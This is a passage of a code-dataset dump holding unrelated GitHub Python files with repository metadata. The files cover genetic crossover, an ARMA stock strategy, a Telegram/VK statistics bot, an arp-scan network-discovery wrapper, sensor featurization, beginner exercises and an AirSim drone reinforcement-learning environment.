ind2o = ind2.deepcopy()\n for i, (x1, x2) in enumerate(zip(ind1o, ind2o)):\n ind1[i] = (1. - alpha) * x1 + alpha * x2\n ind2[i] = alpha * x1 + (1. - alpha) * x2\n\n return ind1, ind2\n\n\ndef cxUniformBlend(ind1, ind2, indpb, alpha):\n ind1o = ind1.deepcopy()\n ind2o = ind2.deepcopy()\n for i, (x1, x2) in enumerate(zip(ind1o, ind2o)):\n if random.random() < indpb:\n ind1[i] = (1. - alpha) * x1 + alpha * x2\n ind2[i] = alpha * x1 + (1. - alpha) * x2\n\n return ind1, ind2\n\n\ndef sxSuppress(ind, base, indpb):\n for i in range(len(ind)):\n if random.random() < indpb:\n idx_base = i if len(base) == len(ind) else 0\n ind[i] = base[idx_base]\n\n return ind\n\n\ndef dang_neighborhood_generation(x, X_S, n_samples=1000, indpb=0.5, neighgen_op=None, base=None):\n\n Z = list()\n n_samples_per_support = max(1, n_samples // len(X_S))\n neighgen_op = neighgen_operators if neighgen_op is None else neighgen_op\n neighgen_op_support = [op for op in neighgen_op if op.startswith('cx')]\n\n for xs in X_S:\n for i in range(n_samples_per_support):\n x_i, xs_i = x.deepcopy(), xs.deepcopy()\n op_id = np.random.choice(neighgen_op_support)\n\n if op_id == 'cxOnePoint':\n x_i, xs_i = cxOnePoint(x_i, xs_i)\n elif op_id == 'cxTwoPoint':\n x_i, xs_i = cxTwoPoint(x_i, xs_i)\n elif op_id == 'cxUniform':\n x_i, xs_i = cxUniform(x_i, xs_i, indpb)\n elif op_id == 'cxBlend':\n alpha = np.random.choice(np.arange(0.1, 1.0, 0.1))\n x_i, xs_i = cxBlend(x_i, xs_i, alpha)\n elif op_id == 'cxUniformBlend':\n alpha = np.random.choice(np.arange(0.1, 1.0, 0.1))\n x_i, xs_i = cxUniformBlend(x_i, xs_i, indpb, alpha)\n\n Z.append(x_i)\n Z.append(xs_i)\n\n if base is not None and 'sxSuppress' in neighgen_op:\n for i in range(n_samples_per_support):\n x_i = x.deepcopy()\n x_i = sxSuppress(x_i, base, indpb)\n Z.append(x_i)\n\n idx = np.random.choice(len(Z), size=n_samples, replace=False)\n Z = [z for i, z in enumerate(Z) if i in idx]\n return Z\n\n","repo_name":"riccotti/DAG","sub_path":"code/dang_neighgen.py","file_name":"dang_neighgen.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31758715966","text":"import numpy as np\nimport pandas as pd\nfrom datetime import datetime\nimport matplotlib.pylab as plt\nplt.rcParams['font.sans-serif']=['SimHei']\nfrom matplotlib.pylab import rcParams\nfrom statsmodels.tsa.stattools import adfuller\nimport pickle\nfrom statsmodels.graphics.tsaplots import plot_pacf, plot_acf\nimport statsmodels\nfrom statsmodels.tsa.arima_model import ARMA\nfrom statsmodels.tsa.arima_model import ARIMA\nimport re\nimport numpy\n\n\nclass Strategy:\n def __init__(self, industry_code):\n self.industry_code = industry_code\n self.intern = pickle.load(open(r'D:/Data/intern.pkl', 'rb'))\n self.MktData = self.intern['MktData']\n self.InstrumentInfo = self.intern['InstrumentInfo']\n self.code_first_MktData = self.MktData.swaplevel(0, 1, axis=1)\n\n def get_industry_descendant(self, industry_code, industry_order=1):\n stock_SWICS = self.intern['InstrumentInfo']['SWICS']\n pattern = re.compile(industry_code[0:industry_order])\n descendant = []\n for index, stock in zip(self.intern['InstrumentInfo'].index, stock_SWICS):\n if re.match(pattern, stock):\n descendant.append(index)\n return np.asarray(descendant)\n\n\n def category_index(self, industry_code, train_size=50):\n descendant = self.get_industry_descendant(industry_code, industry_order=3)\n industry_all = pd.DataFrame()\n yesterday_ret_cumsum = []\n for stock in descendant:\n try:\n industry_all[stock] = self.code_first_MktData[str(stock)]['ret'][-train_size:-1].as_matrix()\n except KeyError:\n continue\n no_NaN = industry_all.dropna(axis=1, how='any')\n industry_cumsum = no_NaN.cumsum()\n industry_index = industry_cumsum.mean(1)\n industry_index.index = self.MktData.index[-train_size:-1]\n extra_stock_performance = industry_cumsum.sub(industry_cumsum.mean(axis=1), axis=0)\n extra_stock_performance.index = self.MktData.index[-train_size:-1]\n return industry_index, extra_stock_performance, yesterday_ret_cumsum\n\n def arma_forecast(self, ts, p, q,):\n arma = ARMA(ts, order=(p, q)).fit(disp=-1)\n ts_predict = arma.predict()\n next_ret = arma.forecast(1)[0]\n #print(\"Forecast stock extra return of next day: \", next_ret)\n # plt.clf()\n # plt.plot(ts_predict, label=\"Predicted\")\n # plt.plot(ts, label=\"Original\")\n # plt.legend(loc=\"best\")\n # plt.title(\"AR Test {},{}\".format(p, q))\n # #plt.show()\n return next_ret, arma.summary2()\n\n def arima_forecast(self, ts, p, i, q,):\n arima = ARIMA(ts, order=(p, i, q)).fit(disp=-1)\n ts_predict = arima.predict()\n next_ret = arima.forecast(1)[0]\n #print(\"Forecast stock extra return of next day: \", next_ret)\n # plt.clf()\n # plt.plot(ts_predict, label=\"Predicted\")\n # plt.plot(ts, label=\"Original\")\n # plt.legend(loc=\"best\")\n # plt.title(\"AR Test {},{}\".format(p, q))\n # #plt.show()\n return next_ret, arima.summary2()\n\n\ndef main():\n test_strategy = Strategy('280201')\n industry_index, extra_stock_performance, yesterday_ret_cumsum = test_strategy.category_index(test_strategy.industry_code)\n # plt.plot(industry_index, label='Industry Index')\n # for stock in extra_stock_performance.columns:\n # plt.plot(extra_stock_performance[stock], label=stock)\n # plt.legend(loc=\"best\")\n # plt.show()\n # print(industry_index.shape)\n # print(extra_stock_performance.shape)\n factor = pd.Series(index=extra_stock_performance.columns)\n summary = {}\n for i, stock in enumerate(extra_stock_performance.columns):\n stock_predict_arma, stock_summary_arma = test_strategy.arma_forecast(extra_stock_performance[stock], 1, 0)\n summary[stock] = stock_summary_arma\n factor[i] = float(stock_predict_arma)\n # stock_predict_arima, stock_summary_arima = test_strategy.arima_forecast(extra_stock_performance[stock], 1, 0, 0)\n # if stock_predict_arma-yesterday_ret_cumsum[i] > 0:\n # print(\"Predicted extra ret of ARMA is:{} bigger than 0,suggested sell out\".format(stock_predict_arma-yesterday_ret_cumsum[i]))\n # else:\n # print(\"Predicted extra ret of ARMA is:{} less than 0,suggested buy in\".format(stock_predict_arma-yesterday_ret_cumsum[i]))\n # if stock_predict_arima-yesterday_ret_cumsum[i] > 0:\n # print(\"Predicted extra ret of ARIMA is:{} bigger than 0,suggested sell out\".format(stock_predict_arima-yesterday_ret_cumsum[i]), stock_predict_arima)\n # else:\n # print(\"Predicted extra ret of ARIMA is:{} less than 0,suggested buy in\".format(stock_predict_arima-yesterday_ret_cumsum[i]), stock_predict_arima)\n return factor, summary\n\n\nif __name__ == '__main__':\n factor, summary = main()\n # x = factor.index\n # y = factor\n # #fig = plt.figure(figsize=(15,2))\n # plt.scatter(x, y)\n # plt.plot([x[0],x[-1]], [0,0], color='r')\n # for a, b in zip(x, y):\n # plt.text(a, b + 0.01, '{0:.5}'.format(b), ha='center', va='bottom', fontsize=7)\n # plt.title(\"280000\")\n # plt.xlabel(\"Stock Code\")\n # plt.ylabel(\"Diviation of each stock from index\")\n # plt.xticks([])\n # plt.show()\n\n\n\n\n # temp = np.array(ret)\n # t = statsmodels.tsa.stattools.adfuller(temp) # ADF检验\n # output = pd.DataFrame(index=['Test Statistic Value', \"p-value\", \"Lags Used\", \"Number of Observations Used\",\"Critical Value(1%)\",\"Critical Value(5%)\",\"Critical Value(10%)\"],columns=['value'])\n # output['value']['Test Statistic Value'] = t[0]\n # output['value']['p-value'] = t[1]\n # output['value']['Lags Used'] = t[2]\n # output['value']['Number of Observations Used'] = t[3]\n # output['value']['Critical Value(1%)'] = t[4]['1%']\n # output['value']['Critical Value(5%)'] = t[4]['5%']\n # output['value']['Critical Value(10%)'] = t[4]['10%']\n # print(output)\n\n #\n import statsmodels.api as sm\n # sm.tsa.arma_order_select_ic(temp,max_ar=6,max_ma=4,ic='aic')['aic_min_order'] # AIC\n # sm.tsa.arma_order_select_ic(temp,max_ar=6,max_ma=4,ic='bic')['bic_min_order'] # BIC\n # sm.tsa.arma_order_select_ic(temp,max_ar=6,max_ma=4,ic='hqic')['hqic_min_order'] # HQIC\n\n # order = (1, 1)\n # train = ret[:-50]\n # test = ret[-50:]\n # tempModel = sm.tsa.ARMA(train, order).fit()\n # tempModel.summary2()\n\n\n","repo_name":"imaugustus/Obsidia","sub_path":"Strategy/ARMA_Strategy.py","file_name":"ARMA_Strategy.py","file_ext":"py","file_size_in_byte":6444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36688552542","text":"def constituiArvoreBinariaDeBusca(raiz):\r\n validade = True\r\n if raiz:\r\n if raiz.esq:\r\n if raiz.esq > raiz.dado:\r\n validade = False\r\n return validade\r\n validade = constituiArvoreBinariaDeBusca(raiz.esq)\r\n if raiz.dir:\r\n if raiz.dir < raiz.dado:\r\n validade = False\r\n return validade\r\n validade = constituiArvoreBinariaDeBusca(raiz.dir)\r\n return validade","repo_name":"pafev/UnB-estrutura-de-dados","sub_path":"árvores/constituiArvoreBinariaDeBusca.py","file_name":"constituiArvoreBinariaDeBusca.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18717789739","text":"# -*- coding: utf-8 -*-\n\nfrom app import logging\nfrom app.utils.post_statistics import statistics as post_statistics\nfrom app.remote.postgresql import Psql as psql\nfrom app.remote.redis import Redis as redis\nfrom telegram.ext.dispatcher import run_async\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup\nfrom datetime import datetime\nfrom time import time\nimport logging\nimport asyncio\nimport requests\n\n\ndef refresh_stats(bot, call, expired=None):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n stats = call.data.split(\"|\", 1)\n if not expired:\n expired = stats[1]\n\n if int(time()) >= int(expired):\n owner_id = loop.run_until_complete(psql.fetchrow('SELECT owner_id FROM channels WHERE id = $1;',\n int(call.message.chat.id)))['owner_id']\n community_id = loop.run_until_complete(\n psql.fetchrow('SELECT community_id FROM posts WHERE chat_id = $1 AND message_id = $2;',\n int(call.message.chat.id), int(call.message.message_id)))['community_id']\n post_id = loop.run_until_complete(\n psql.fetchrow('SELECT post_id FROM posts WHERE chat_id = $1 AND message_id = $2;',\n int(call.message.chat.id), int(call.message.message_id)))['post_id']\n access_token = loop.run_until_complete(psql.fetchrow(\n 'SELECT access_token FROM users WHERE id = $1;',\n int(owner_id)\n ))['access_token']\n\n post = requests.post(\"https://api.vk.com/method/wall.getById\",\n data={\n \"posts\": str(str(community_id) + \"_\" + str(post_id)),\n \"copy_history_depth\": 1,\n \"extended\": 1,\n \"access_token\": access_token,\n \"v\": \"5.80\"\n }).json()['response']['items'][0]\n update_status = post_statistics(bot, posts=post, chat_id=call.message.chat.id,\n message_id=call.message.message_id, mtype=\"update\")\n if update_status == \"OK\" or update_status == \"IS NOT MODIFIED\":\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"✅ Статистика данной публикации была успешно обновлена! \"\n \"Нажмите на кнопку(-и) еще раз, чтобы увидеть обновленные значения. \"\n \"Обратите внимание, что клиенту потребуется до 30 секунд для их обновления.\",\n show_alert=True, cache_time=30)\n else:\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"❌ Что-то пошло не так при попытке обновлении статистики данной \"\n \"публикации, попробуйте позже.\",\n show_alert=True, cache_time=30)\n else:\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"❌ Статистика данной публикации была недавно обновлена, попробуйте \"\n \"немного позже.\",\n show_alert=True, cache_time=30)\n\n\n@run_async\ndef callback(bot, call):\n try:\n call = call.callback_query\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n\n if call.message:\n if call.data.startswith(\"channel_counters\"):\n counter = call.data.split(\"|\", 2)\n\n if counter[1] == \"time\":\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"🕒 Время публикации данного поста: {0} MSK.\".format(\n str(datetime.fromtimestamp(\n int(counter[2])).strftime(\"%d.%m.%y, %H:%M:%S\"))),\n show_alert=True, cache_time=30)\n elif counter[1] == \"likes\":\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"💖 Количество лайков: {0}.\".format(\n str(counter[2])), show_alert=True, cache_time=30)\n elif counter[1] == \"comments\":\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"💬 Количество комментариев: {0}.\".format(\n str(counter[2])), show_alert=True, cache_time=30)\n elif counter[1] == \"reposts\":\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"🔁 Количество репостов: {0}.\".format(\n str(counter[2])), show_alert=True, cache_time=30)\n elif counter[1] == \"views\":\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"👁 Количество просмотров: {0}.\".format(\n str(counter[2])), show_alert=True, cache_time=30)\n elif counter[1] == \"poll\":\n poll = loop.run_until_complete(redis.execute(\"GET\", str(\"poll&\" + str(counter[2]))))\n if not poll:\n logging.debug(\"Poll Name is None, most likely this poll isn't in the cache.\")\n refresh_stats(bot, call, expired=1)\n return\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"📋 Название голосования: {0}.\".format(\n str(poll[0:170])), show_alert=True, cache_time=30)\n elif counter[1] == \"poll_ans\":\n poll_answer = loop.run_until_complete(redis.execute(\"GET\", str(\"poll_answer&\" + str(counter[2]))))\n if not poll_answer:\n logging.debug(\"Poll Answer is None, most likely this poll isn't in the cache.\")\n refresh_stats(bot, call, expired=1)\n return\n else:\n poll_answer = poll_answer.split(\"?|&|&|!\", 1)\n bot.answer_callback_query(callback_query_id=call.id,\n text=\"❎ Количество голосов за {0}: {1} голосов.\".format(\n str(poll_answer[0][0:140]), str(poll_answer[1])),\n show_alert=True, cache_time=30)\n elif call.data.startswith(\"channel_refresh_stats\"):\n refresh_stats(bot, call)\n bot.answer_callback_query(callback_query_id=call.id, show_alert=False)\n except Exception as e:\n logging.error(\"Exception has been occurred while trying to execute the method.\", exc_info=True)\n return e\n","repo_name":"mestrogov/snresistance","sub_path":"app/handlers/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13816518367","text":"import argparse\nimport re\nimport shutil\nimport subprocess\nimport sys\n\nclass ArpScanner:\n interface = ''\n hosts = ''\n\n def __init__(self, interface, hosts='--localnet'):\n self.interface = interface\n self.hosts = hosts\n\n def scan(self):\n sudo = shutil.which('sudo')\n if not sudo:\n raise FileNotFoundError('sudo binary is needed')\n arpscan = shutil.which('arp-scan')\n if not arpscan:\n raise FileNotFoundError('arp-scan binary is needed')\n if not subprocess.getstatusoutput(sudo + ' -n true')[0] == 0:\n raise PermissionError('You must be a sudoers without password')\n pargs = [sudo, '-n', arpscan, '-I', self.interface, self.hosts]\n try:\n out = subprocess.check_output(pargs, universal_newlines=True, timeout=5)\n except subprocess.TimeoutExpired:\n pass\n re_ip = r'(?P((2[0-5]|1[0-9]|[0-9])?[0-9]\\.){3}((2[0-5]|1[0-9]|[0-9])?[0-9]))'\n re_mac = r'(?P([0-9a-fA-F]{2}[:-]){5}([0-9a-fA-F]{2}))'\n re_hw = r'(?P[\\w.]+)'\n pattern = re.compile(re_ip + '\\s+' + re_mac + '\\s' + re_hw)\n return [match.groupdict() for match in re.finditer(pattern, out)]\n\ndef main():\n desc = 'Command-line tool for network discovery. \\\n It is a Python wrapper for arp-scan tool. \\\n Both this command and sudo are needed.'\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument('interface', help='interface to scan')\n parser.add_argument('-H', '--hosts', default='--localnet', help='host or network to scan')\n args = parser.parse_args()\n arpscan = ArpScanner(args.interface, args.hosts)\n for entry in arpscan.scan():\n print('{mac}: {ip} ({hw})'.format(**entry))\n\nif __name__ == '__main__':\n sys.exit(main())","repo_name":"MoraAndrea/controller-drone-ui","sub_path":"controller/Utils/arpscan.py","file_name":"arpscan.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73449902132","text":"from data.compile_dataset import Activity_Split, Activity, Window\nfrom features.featurizations import *\n# from copy_compile_dataset import Activity_Split, Activity, Window\n# from featurizations import *\nimport pickle\nimport numpy as np\nimport pandas as pd\n\nACCEL_AGGS = [get_std, get_RMS, get_ZCR, get_ABSDIFF, get_FFT5, get_spectral]\nVIDEO_AGGS_CENTRE = [get_std, get_range, get_ABSDIFF]\nVIDEO_AGGS_BOUNDS = [get_height_mean, get_height_std, get_height_range, get_volume_aggs]\nN_NANS = len(VIDEO_AGGS_CENTRE)*4 + len(VIDEO_AGGS_BOUNDS)*3\n\n\nclass Featurize(object):\n '''\n Class to create feature matrix in preparation for modelling from list of Window objects with raw time series\n '''\n def __init__(self, window_lst):\n '''\n sets attributes\n '''\n self.raw_windows = window_lst\n self.create_features()\n # self.create_vidfeatures()\n\n def create_features(self):\n '''\n runs through list of aggregate functions (see globals above) and assembles feature matrix\n '''\n self.activity_labels = []\n self.activity_cats = []\n self.col_labels_accel = []\n feature_matrix_accel = []\n \n self.col_labels_video = []\n feature_matrix_video = []\n\n first_iter_accel = True\n first_iter_video = True\n for win in self.raw_windows:\n feature_row_accel = []\n feature_row_video = []\n\n for acc_agg in ACCEL_AGGS:\n if first_iter_accel:\n data_accel, label_accel = acc_agg(win.accel)\n self.col_labels_accel.extend(label_accel)\n feature_row_accel.extend(data_accel)\n else:\n data_accel, _ = acc_agg(win.accel)\n feature_row_accel.extend(data_accel)\n\n if win.has_video:\n if win.video.shape[0] >= 8:\n centre_data = np.array(win.video.values[:, :3], dtype='float')\n bounds_data = np.array(win.video.values[:, 3:9], dtype='float')\n for vid_centre_agg in VIDEO_AGGS_CENTRE:\n if first_iter_video:\n data_video, label_video = vid_centre_agg(centre_data)\n self.col_labels_video.extend(label_video)\n feature_row_video.extend(data_video)\n else:\n data_video, _ = vid_centre_agg(centre_data)\n feature_row_video.extend(data_video)\n\n for vid_bounds_agg in VIDEO_AGGS_BOUNDS:\n if first_iter_video:\n data_video, label_video = vid_bounds_agg(bounds_data)\n self.col_labels_video.extend(label_video)\n feature_row_video.extend(data_video)\n else:\n data_video, _ = vid_bounds_agg(bounds_data)\n feature_row_video.extend(data_video)\n first_iter_video = False\n else:\n feature_row_video.extend([np.nan] * N_NANS)\n else:\n feature_row_video.extend([np.nan] * N_NANS)\n first_iter_accel = False\n\n feature_matrix_video.append(feature_row_video)\n feature_matrix_accel.append(feature_row_accel)\n self.activity_labels.append(win.name)\n self.activity_cats.append(win.category)\n self.X_accel = np.array(feature_matrix_accel)\n self.X_video = np.array(feature_matrix_video)\n\n\n\nif __name__ == \"__main__\":\n filehandle = open('features/all_data_windowed.obj', 'rb')\n AARP_data = pickle.load(filehandle)\n\n data_featured = Featurize(AARP_data.windows)\n data_featured.create_features()\n\n\n print('complete')\n\n","repo_name":"caseyolson8/Human-Activity-Recognition-wSensors","sub_path":"src/features/build_features.py","file_name":"build_features.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71280431413","text":"import pandas as pd\nimport random\n\ntraindata = pd.read_csv('ex1_train_data.csv', delimiter=';')\n\ndef mse(Y, Y_pred):\n result = 1/len(Y) * sum((Y - Y_pred) ** 2)\n return result\n\na = random.randrange(1, 100)\nb = random.randrange(1, 100)\nL = 0.0001\nepochs = 10000\n\nfor i in range(epochs):\n Y_pred = traindata['x'] * a + b\n\n n = len(Y_pred)\n\n a = a - L * (-2/n) * sum(traindata['x'] * (traindata['y'] - Y_pred))\n b = b - L * (-2/n) * sum(traindata['y'] - Y_pred)\n\nY_pred = traindata['x'] * a + b\nfinal_mse = mse(traindata['y'], Y_pred)\nprint('mse = %.3f, learned a = %3.f, learned b = %.3f')","repo_name":"Sinisca/Facens","sub_path":"Inteligência Artificial/EX_4_7.py","file_name":"EX_4_7.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3580514046","text":"\n#to są zmienne\n\ncalkowita = 4 #liczby całokowite / int / integer\n\nznaczki = \"kuc\" #ciąg znaków / string / str\n\nczyPrawda = 2 == 1 #prawda fałsz / bool / boolean\n\nprzecinek = 3.14 #liczby zmiennoprzecinkowe / float\n\n\n#zamienianie wartości\n#zamiast 1 dać trzeba jakąś wartość albo zmienną\n\nstr(1) #do stringu\nint(1) #do integeru/inta\nfloat(1) #do floatu\nbool(1) #do boolu/boolean\n\n\n#drukuje zmienną 'integer' zamienioną na string + jakiś tekst\nprint(str(integer) + \" o to nasza liczba\")\n","repo_name":"Blejek/UczeniePythona","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43039021327","text":"# Aを、左から要素を確定させていく\n# 既に確定させたAの要素からなる集合をSとする\n# 配るDP\ndef main():\n n, x, y = map(int, input().split())\n A = list(map(int, input().split()))\n B = list(map(int, input().split()))\n\n ALL = 1 << n\n INF = float('inf')\n DP = [INF]*ALL\n DP[0] = 0\n\n for cur_S in range(ALL):\n # x not in S\n cur_n = popcount(cur_S)\n for i, a_i in enumerate(A):\n if cur_S >> i & 1:\n continue\n nex_S = cur_S | (1 << i)\n # i, a_iをn番目に持ってくる\n # [0, n-1]は既に埋まっている\n # したがって、i以下の、cur_Sに含まれない要素の数がswap回数\n lower_i_subset = ~cur_S & ((1 << i) - 1)\n swap_cnt = popcount(lower_i_subset)\n cost_y = swap_cnt * y\n cost_x = abs(B[cur_n] - a_i)*x\n DP[nex_S] = min(DP[nex_S], DP[cur_S] + cost_x + cost_y)\n\n print(DP[ALL - 1])\n\n\ndef popcount(S):\n return bin(S).count('1')\n\n\nmain()\n","repo_name":"batamorphism/coding","sub_path":"Python/AtCoder/old/abc232_f_0122.py","file_name":"abc232_f_0122.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14452181417","text":"import gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\nimport time\nimport numpy as np\nimport airsim\nimport math\nimport random \n''' \n Observation: \n Type: Box(12)\n Num Observation Min Max\n 0 Quad postion x -Inf Inf\n 1 Quad postion y -Inf Inf\n 2 Quad postion z -Inf Inf\n 3 Quad Velocity x -Inf Inf\n 4 Quad Velocity y -Inf Inf\n 5 Quad Velocity z -Inf Inf\n 6 Quad Orientation roll -pi/2 pi/2\n 7 Quad Orientation pitch -pi/2 pi/2\n 8 Quad Orientation yaw -pi/2 pi/2\n 9 Quad Angular_velocity x -Inf Inf\n 10 Quad Angular_velocity y -Inf Inf\n 11 Quad Angular_velocity z -Inf Inf\n \n Actions:\n Type: Box(4) \n Num Action Min Max \n 0 roll rate -1 +1\n 1 pitch rate -1 +1\n 2 yaw rate -1 +1\n 0 throttle 0 +1\n\n Goal positon: (8,5,16)\n This goal in Unity Frame of reference \n\n Maximum time steps = 300 \n'''\nclass AirsimEnv(gym.Env): \n state_mean = np.array([0, 0, 1.412217970937490531e-05, 0, 0, 1.647552423179149753e-02, 0, 0, 3.141592653589793116e+00, 0, 0 ,0, 6.5, 3.141])\n state_s_k = np.zeros(14)\n reward_mean = 0\n reward_s_k = 0\n k = 0\n def __init__(self):\n # try static attribute\n observation_low = -1 * np.array([np.inf,np.inf,np.inf, # positon lower limits\n np.inf,np.inf,np.inf, # linear velocity lower limits\n np.pi/2,np.pi/2,np.inf, # orientation lower limits\n np.inf,np.inf,np.inf, # angular velocity lower limits\n np.inf, np.inf]) # goal x,y,z position in local frame \n observation_high = np.array([np.inf,np.inf,np.inf, # positon upper limits\n np.inf,np.inf,np.inf, # linear velocity upper limits\n np.pi/2,np.pi/2,np.inf, # orientation upper limits\n np.inf,np.inf,np.inf, # angular velocity upper limits\n np.inf, np.inf]) # goal x,y,z position in local frame\n\n self.observation_space = spaces.Box(observation_low, observation_high, dtype=np.float32)\n \n\n actions_low = np.array([-np.inf]*3)\n actions_high = np.array([np.inf]*3)\n self.action_space = spaces.Box(actions_low, actions_high, dtype=np.float32)\n \n \n # The goal is specified in unity global coordinate system \n # then transformed to the quad coordinate system to compute the reward.\n # self.goal = np.array([goal[0],goal[1],goal[2]])\n\n self.time_step = 0 \n self.done = False\n self.max_eps_steps = 1500\n self.max_episode_steps = 1500\n\n self.seed()\n \n self.airsimClient = airsim.MultirotorClient()\n self.airsimClient.confirmConnection()\n self.airsimClient.enableApiControl(True)\n self.airsimClient.armDisarm(True)\n self.isReseted = False\n\n\n # self.goal = [10 * np.random.randn()\n # , 10 * np.random.randn()\n # , np.random.uniform(-5,-10)]\n # time.sleep(0.1)\n\n # def setGoal(self, goal):\n # # goal = self._r_u_to_q(np.array(goal[0],goal[1],goal[2]))\n # # goal = [2.5, 4.9, -5]\n # self.goal = [goal[0], goal[1], goal[2]]\n\n def step(self, action):\n AirsimEnv.k += 1\n # Check if the user has reseted the environment and the action is whtih in the bound \n # print(action)\n # action = np.clip(action,-1,1)\n assert self.isReseted , \"Environments should be reseted before taking an action\" \n assert self.action_space.contains(action), f\"Action {action} is out of bound\"\n self.time_step += 1\n # comit the action, \n # print(f'action0 {float(action[0])}')\n # print(f'action1 {float(action[1])}')\n # print(f'action2 {float(action[2])}')\n # print(f'action3 {float(action[3])}')\n # self.airsimClient.moveByAngleRatesThrottleAsync(float(action[0]), # roll rate\n # float(action[1]), # pitch rate\n # float(action[2]), # yaw rate\n # 0.6, # throttle\n # 0.1).join() # duration\n if not self.done:\n self.airsimClient.moveByAngleRatesZAsync(float(action[0]),\n float(action[1]),\n float(action[2]),\n self.goal[2],\n 0.01).join()\n # time.sleep(0.15)\n quad_state = self.airsimClient.getMultirotorState().kinematics_estimated\n state,state_tup = self._extract_state(quad_state)\n quad_postion = state_tup[0]\n\n goal_quad_frame = self.goal\n reward = self._compute_DTG_reward(state_tup, goal_quad_frame, action)\n # a z position high than 0.7 means the quad is under the Environment plane/terrain\n # TODO: add collision detiction\n\n # if self.time_step > 5:\n # collision_info = self.airsimClient.simGetCollisionInfo()\n # is_collided = collision_info.has_collided\n # if is_collided:\n # print(\"collision detcted\")\n # self.done = True\n # reward = -1000\n\n # if (np.abs(state[7]) > 0.6 or np.abs(state[6]) > 0.6 ):\n # print('extreme angle orientation')\n # self.done = True\n # reward = -5000\n\n if quad_postion[2] > 0.7:\n print(\"Collided\")\n self.done = True\n reward = -1e6\n\n if not self.done:\n reward = self._compute_DTG_reward(state_tup, goal_quad_frame, action)\n l2_dis = self._compute_l2_distance(quad_postion, goal_quad_frame)\n # print(f'l2 dis {l2_dis}')\n # Solved !\n if l2_dis <= 1.5:\n # self.done = True \n print(\"Solved!\")\n if self.num_reached_goals == 0:\n reward = 3e6\n print(f\"solved at {quad_postion} fot goal number {self.num_reached_goals+1}\")\n elif self.num_reached_goals == 1:\n reward = 5e6\n print(f\"solved at {quad_postion} fot goal number {self.num_reached_goals+1}\")\n else:\n reward = 9e6\n print(f\"solved at {quad_postion} fot goal number {self.num_reached_goals+1}\")\n self.done = True\n if not self.done:\n # self.goal_ind += 1\n self.goal += self.GenerateGoal(range_min=3, range_max=10, init_point=state_tup[0])\n self.goal = self.GoalsToQuadFrame(self.goal.copy())\n print(f\"new goal is {self.goal}\")\n print(f\"distance to goal {self._compute_l2_distance(quad_postion, self.goal.copy())}\")\n self.num_reached_goals += 1\n \n # elif l2_dis <= 0.3:\n # print('0.3 region')\n # reward = 1000\n # elif l2_dis <=0.5:\n # print('print 0.5 region')\n # reward = 500\n elif l2_dis >100:\n print(\"too far\")\n self.done = True\n reward = -1e6\n state_dict = self._state_to_dict(state)\n actions_dict = self._action_to_dict(action)\n info = {'time_step':self.time_step, 'state': state_dict,'action' :actions_dict}\n\n if self.time_step >= self.max_eps_steps:\n print(\"over time\")\n self.done = True\n reward = -1e6\n done = self.done\n\n\n # print(f'state {state}')\n # print(f'reward {reward}')\n\n # Normalize the state and reward\n self.state_mean_prev = AirsimEnv.state_mean.copy()\n AirsimEnv.state_mean = self.state_mean_prev + ((1/AirsimEnv.k)*(state.copy() - self.state_mean_prev))\n AirsimEnv.state_s_k += (state.copy() - self.state_mean_prev) * (state.copy() - AirsimEnv.state_mean.copy())\n\n if AirsimEnv.k == 2 :\n state_std = np.zeros(14)\n state_std += 0.01\n else:\n state_std = np.sqrt(AirsimEnv.state_s_k.copy()/(max(AirsimEnv.k-1,2)))\n\n #state #= (state.copy() - AirsimEnv.state_mean.copy()) / state_std.copy()\n\n self.reward_mean_prev = AirsimEnv.reward_mean\n AirsimEnv.reward_mean = self.reward_mean_prev + ((1/AirsimEnv.k)*(reward - self.reward_mean_prev))\n AirsimEnv.reward_s_k += (reward - self.reward_mean_prev) * (reward - AirsimEnv.reward_mean)\n reward_std = np.sqrt(AirsimEnv.reward_s_k/(AirsimEnv.k-1))\n\n reward = reward / reward_std\n self.reward_sum += reward\n\n if self.done:\n print(f\"reward_sum {self.reward_sum}\")\n print(f\"reward std {reward_std}\")\n print(f\"reward_mean {AirsimEnv.reward_mean}\")\n # print(f\"state {state}\")\n\n\n\n # print(f\"state {state} shape {state.shape}\")\n # print(f\"mean {self.state_mean} shape {self.state_mean.shape}\")\n # print(f\"state_std {state_std} shape {state_std.shape}\")\n\n # print(f\"norm state {state} shape {state.shape}\")\n return state, reward, done, info\n\n def reset(self):\n AirsimEnv.k += 1\n self.reward_sum = 0\n # set the goals\n # goals = [self.GenerateGoal(range_min=5, 